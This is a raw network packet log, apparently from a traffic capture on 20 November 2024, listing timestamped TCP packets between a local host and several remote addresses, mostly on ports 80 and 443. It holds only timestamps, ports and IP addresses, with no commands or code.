                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.504786968 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.504802942 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.504817963 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.504828930 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.504838943 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.504846096 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.504846096 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.504849911 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.504861116 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.504869938 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.504918098 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.504918098 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.504934072 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.504951954 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.504961967 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.504971981 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.505013943 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.505013943 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.505633116 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.505642891 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.505652905 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.505662918 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.505671978 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.505681038 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.505695105 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.505703926 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.505714893 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.505724907 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.505738020 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.505738020 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.505815983 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.505815983 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.505836964 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.505847931 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.505856037 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.505959034 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.505984068 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.506007910 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.506053925 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.506053925 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.506406069 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.506416082 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.506424904 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.506489992 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.506738901 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.506750107 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.506759882 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.506787062 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.506829023 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.506875038 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.506887913 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.506896019 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.506906986 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.506917000 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.506927013 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.506937027 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.506958008 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.506958008 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.506993055 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.507014990 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.507074118 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.507181883 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.507194042 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.507204056 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.507214069 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.507224083 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.507235050 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.507262945 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.507262945 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.507428885 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.507441044 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.507450104 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.507458925 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.507467985 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.507515907 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.507515907 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.507515907 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.507750988 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.507762909 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.507774115 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.507782936 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.507793903 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.507834911 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.507898092 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.507910013 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.507919073 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.507929087 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.507952929 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.507952929 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.507998943 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.508039951 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.508050919 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.508060932 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.508142948 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.508176088 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.508187056 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.508196115 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.508204937 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.508214951 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.508223057 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.508234024 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.508234978 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.508272886 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.508272886 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.508313894 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.508354902 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.508364916 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.508375883 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.508384943 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.508394957 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.508407116 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.508419037 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.508452892 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.508452892 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.508452892 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.508476973 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.508486032 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.508497000 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.508506060 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.508517027 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.508527040 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.508529902 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.508538008 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.508548021 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.508558989 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.508569002 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.508579969 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.508599043 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.508599043 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.508599043 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.508641005 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.508641005 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.555179119 CET4434998313.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.556694031 CET49983443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.556704998 CET4434998313.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.557049036 CET4434998313.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.557988882 CET49983443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.558048010 CET4434998313.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.558593988 CET49983443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.581520081 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.583303928 CET49987443192.168.2.6142.250.80.1
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.583319902 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.583743095 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.583758116 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.583805084 CET49987443192.168.2.6142.250.80.1
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.583811045 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.583858013 CET49987443192.168.2.6142.250.80.1
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.584476948 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.585789919 CET49987443192.168.2.6142.250.80.1
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.585864067 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.586205959 CET49987443192.168.2.6142.250.80.1
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.586219072 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.589978933 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.590018034 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.590029955 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.590044975 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.590065002 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.590092897 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.590094090 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.590107918 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.590121984 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.590166092 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.590166092 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.590337992 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.590348005 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.590358973 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.590415955 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.590426922 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.590437889 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.590449095 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.590452909 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.590460062 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.590507984 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.590508938 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.590508938 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.590559959 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.590569973 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.590580940 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.590641022 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.590652943 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.590672016 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.590714931 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.590735912 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.590805054 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.590816021 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.590826988 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.590836048 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.590847015 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.590857983 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.590862989 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.590862989 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.590868950 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.590939045 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.590939045 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.590954065 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.590965033 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.590975046 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.590986967 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.590998888 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.591008902 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.591020107 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.591029882 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.591042995 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.591048002 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.591048002 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.591048002 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.591056108 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.591099977 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.591099977 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.591118097 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.591263056 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.591281891 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.591295004 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.591306925 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.591327906 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.591337919 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.591337919 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.591340065 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.591355085 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.591358900 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.591394901 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.591459036 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.597103119 CET49978443192.168.2.6204.79.197.219
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.599329948 CET4434998313.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.603152990 CET4434998413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.603816986 CET49984443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.603830099 CET4434998413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.604430914 CET49984443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.604435921 CET4434998413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.624612093 CET4434998513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.625277042 CET49985443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.625302076 CET4434998513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.625766039 CET49985443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.625771999 CET4434998513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.627141953 CET49987443192.168.2.6142.250.80.1
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.663177013 CET4434998313.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.663202047 CET4434998313.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.663275957 CET49983443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.663285971 CET4434998313.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.663300037 CET4434998313.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.663464069 CET49983443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.664966106 CET4434998613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.668056965 CET49986443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.668071032 CET4434998613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.668752909 CET49986443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.668756008 CET4434998613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.670121908 CET49983443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.670144081 CET4434998313.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.670499086 CET49998443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.670531988 CET4434999813.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.670610905 CET49998443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.671448946 CET49998443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.671459913 CET4434999813.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.673130035 CET4434998813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.673557043 CET49988443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.673569918 CET4434998813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.674432993 CET49988443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.674438000 CET4434998813.107.246.45192.168.2.6
